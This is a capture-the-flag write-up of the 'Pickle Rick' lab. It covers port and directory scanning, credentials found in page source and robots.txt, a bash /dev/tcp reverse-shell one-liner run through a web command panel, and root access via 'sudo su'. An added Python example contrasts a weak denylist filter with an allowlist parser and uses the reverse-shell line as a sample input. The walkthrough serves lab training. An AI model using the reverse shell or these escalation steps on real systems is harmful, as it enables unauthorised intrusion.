# Pickle Rick

![](/files/-Mak3qHHNTT7AZXhvntn)

## Reconnaissance

Let's start with an initial nmap scan to find open ports.

```
nmap -Pn 10.10.249.44
```

![](/files/-Mak4TfZwLVNscIX6F8j)

Detailed Nmap scan:

Command breakdown:

* (**-sV**): Service version
* (**-sC**): Default nmap scripts
* (**-p**): Specifying ports 22,80
* (**-oN nmap**): Saving the output into a file called nmap

```
nmap -sC -sV -p 22,80 -oN nmap 10.10.249.44
```

![](/files/-Mak4omHkD1umv-62tZ7)

## Enumerate

### Port 80

Let's visit the website and look at the source code.

![](/files/-Mak59ZZL-Ikj9JmPuTb)

![](/files/-Mak5Q-ZXa6GTpXhM2x2)

Let's add this to our notes. I personally use `gedit` on the Kali virtual machine, then transfer all of it to "OneNote" on my host machine and organize it. To use gedit: `gedit <name of file>`

```
gedit notes
```

![](/files/-Mak61bG06dGULZD1sXh)

Now let's visit `robots.txt`. We usually find something interesting on this page, like hidden directories or sometimes even passwords.

![](/files/-Mak6KBdFkykmm5kODbe)

This looks interesting. It could probably be a directory, but I tested it and it was not, so it could be a password. Let's save it in our notes.

![](/files/-Mak6g35NBsY4oW2nle0)

Now let's run `Gobuster` to see if we can find hidden directories.

Command breakdown:

* (**-w**): Specifying wordlist
* (**-u**): Specifying URL
* (**-x**): Specifying extensions

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.249.44 -x txt,php,html
```

![](/files/-Mak7z4ut6o77qoj1e-F)

`/login.php` and `/portal.php` were the same page, as `/portal.php` redirects us to `/login.php`.

`/assets` had some JavaScript and CSS files which did not look like they were going to help us exploit this machine.

Now we have found ourselves a login page.

![](/files/-Mak8c1nHLkBRdh-gUuC)

And if we look at our notes, we have a username and a possible password. Let's try using them to log in.

And we got in!!

![](/files/-Mak8pKJXygZciFGyKt4)

We have a command panel where we can run some commands. Let's explore it.

Running `ls` gives us the files present in the current directory.

![](/files/-Mak92SwiNO5uhsd1XXP)

Let's try reading those files.

```
cat Sup3rS3cretPickl3Ingred.txt
```

And... the command is disabled. So what can we do here? If we try different commands, we can see that many commands are allowed but `cat` is not. After a lot of searching I found a command that gave us a reverse shell on the server.

```
bash -c 'exec bash -i &>/dev/tcp/10.13.8.64/1234 <&1'
```

![](/files/-MakAW5XRYnEICvr7Cd9)
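
Why blocking `cat` alone did not protect the panel, as an added example (not code from the room or from this writeup): a hypothetical denylist filter next to an allowlist that parses input without a shell. The function names, the substring logic of the weak filter and the allowlist contents are assumptions; the sample inputs are the commands typed into the panel above.

```python
import shlex

# Hypothetical model of the panel's filter: reject input containing a blocked
# word, pass everything else to a shell. The page only shows `cat` as blocked.
DENYLIST = {"cat"}

def denylist_allows(command: str) -> bool:
    """Weak check: substring match against blocked command names."""
    return not any(word in command for word in DENYLIST)

# Hardened form (assumed policy): only these programs, only these arguments.
ALLOWED = {"ls": {"-l", "-a", "-la"}, "whoami": set(), "uptime": set()}

def allowlist_parse(command: str):
    """Return an argv list for subprocess.run(argv, shell=False), or None."""
    try:
        argv = shlex.split(command)   # no shell: metacharacters stay literal text
    except ValueError:                # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED:
        return None
    if any(arg not in ALLOWED[argv[0]] for arg in argv[1:]):
        return None
    return argv

# Sample inputs: the commands typed into the panel in this writeup.
SAMPLES = [
    "ls",
    "cat Sup3rS3cretPickl3Ingred.txt",
    "bash -c 'exec bash -i &>/dev/tcp/10.13.8.64/1234 <&1'",
]

def compare(commands):
    """Map each command to (passes denylist, passes allowlist)."""
    return {c: (denylist_allows(c), allowlist_parse(c) is not None) for c in commands}

if __name__ == "__main__":
    for cmd, (deny_ok, allow_ok) in compare(SAMPLES).items():
        print(f"denylist={'pass' if deny_ok else 'block':5} "
              f"allowlist={'pass' if allow_ok else 'block':5} {cmd}")
```

The denylist only stops the one command its author thought of, while the allowlist rejects anything that is not an expected program with expected arguments.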

And now we can read the contents of Sup3rS3cretPickl3Ingred.txt.

```
cat Sup3rS3cretPickl3Ingred.txt
```

![](/files/-MakAfFCwS8uks8a9-Kh)

This is the answer to the first question.

![](/files/-MakAotQjh0dgx8boXr2)

Now let's enumerate the machine and find a way to get root.

## Privilege Escalation

While looking around I found the second ingredient which is the second answer.

![](/files/-MakBMeygdKVJTasbFEk)

![](/files/-MakCEM1zhuoGtTV3FUG)

Now let's try to become root to cd into the root directory, as I think the final ingredient is hidden there. Let's run the command `sudo -l` to see if we can run files as other users.

```
sudo -l
```

![](/files/-MakBgSEG-UgzC5x0vAD)

We are allowed to run ALL, so let's try switching users to root using the command `su`.

```
sudo su
```

![](/files/-MakBx2JcRQGxaVslufw)

And we are root! We can also see the 3rd and final ingredient in the root directory.

![](/files/-MakC8pwOhs6g1l05IOj)

![](/files/-MakCICyd9MeI-b1yeBi)

